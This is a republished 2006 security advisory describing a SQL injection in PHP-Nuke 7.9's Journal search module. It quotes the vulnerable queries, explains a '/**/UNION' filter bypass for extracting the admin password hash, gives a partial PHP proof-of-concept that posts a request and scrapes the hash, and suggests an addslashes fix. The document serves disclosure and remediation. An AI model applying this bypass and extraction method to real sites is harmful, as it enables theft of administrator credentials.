PHP-Nuke <= 7.9 Journal module (search.php) "forwhat" SQL Injection vulnerability

2006-11-01T00:00:00
ID SECURITYVULNS:DOC:14883
Type securityvulns
Reporter Securityvulns
Modified 2006-11-01T00:00:00

Description

/*

[N]eo [S]ecurity [T]eam [NST] - Advisory 29 - 2006-10-31

Program: PHP-Nuke Homepage: http://www.php.net Vulnerable Versions: PHP-Nuke <= 7.9 Risk: Medium Impact: Medium Risk

-==PHP-Nuke <= 7.9 Journal module (search.php) "forwhat" SQL Injection vulnerability==-

- Description

PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases.

- Tested

localhost & many sites

- Vulnerability Description

In /modules/Journal/search.php the "forwhat" variable is not sanitized correctly. Here is the vulnerable code:

==[ /modules/Journal/search.php 125-136 ]========================== [...] if ($bywhat == 'aid'): if ($exact == '1') { $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE u.username=j.aid and j.aid='$forwhat' order by j.jid DESC"; } else {
$sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE u.username=j.aid and j.aid like '%$forwhat%' order by j.jid DESC"; } elseif ($bywhat == 'title'): $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE u.username=j.aid and j.title like '%$forwhat%' order by j.jid DESC"; elseif ($bywhat == 'bodytext'): $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u WHERE u.username=j.aid and j.bodytext LIKE '%$forwhat%' order by j.jid DESC"; elseif ($bywhat == 'comment'): $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j, ".$user_prefix."_users u, ".$user_prefix."_journal_comments c WHERE u.username=j.aid and c.rid=j.jid and c.comment LIKE '%$forwhat%' order by j.jid DESC"; endif; [...] ==[ end /modules/Journal/search.php ]==============================

magic_quotes_gpc php directive must be turned Off so the simple quotes (') are not filtered. Also we have to know the prefix used for the database tables ("nuke_" by default).

In this way, bypassing the SQL Injection Protection, like using someone like '/**/UNION ' and not ' UNION ' in our sql injections, we can get the admin md5 hash without any problems.

==Pseudo-Code Proof of Concept exploit== <? /*

Neo Security Team - Pseudo-Code Proof of Concept Exploit http://www.neosecurityteam.net Paisterist

/ set_time_limit(0); $host="localhost"; $path="/phpnuke/"; $port="80"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $data=""; / Here the variables, like "bywhat" and "forwhat", with the SQL Injection */

if ($fp) { / we put the POST request on $p variable, sending the data saved on $data. /

fwrite&#40;$fp, $p&#41;;

while &#40;!feof&#40;$fp&#41;&#41; {
    $content .= fread&#40;$fp, 4096&#41;;
}

preg_match&#40;&quot;/&#40;[a-zA-Z0-9]{32}&#41;/&quot;, $content, $matches&#41;;

if &#40;$matches[0]&#41;
print &quot;&lt;b&gt;Hash: &lt;/b&gt;&quot;.$matches[0];

} ?> ==Pseudo-Code Proof of Concept exploit==

Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table.

- How to fix it? More information?

You can found a patch on http://www.neosecurityteam.net/foro/

Also, you can modify the line 61 of /modules/Journal/search.php, adding slashes before the simple quotes with the addslashes() function:

==[ /modules/Search/index.php 59-62 ]========================== [...] else : $forwhat = filter($forwhat, "nohtml"); $forwhat = addslashes(filter($forwhat, "nohtml")); endif; [...] ==[ end /modules/Search/index.php ]==============================

That's a momentary solution to the problem. I recommend to download the PHP-Nuke 8.0 version in the next days... it is not free at the moment.

- References

http://www.neosecurityteam.net/index.php?action=advisories&id=29

- Credits

Search module SQL Injection discovered by Paisterist -> paisterist[dot]nst [at] gmail[dot]com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/

- Greets

HaCkZaTaN K4P0 Daemon21 Link 0m3gA_x LINUX nitrous m0rpheus nikyt0x KingMetal Knightmare

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@ @@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@

/ EOF /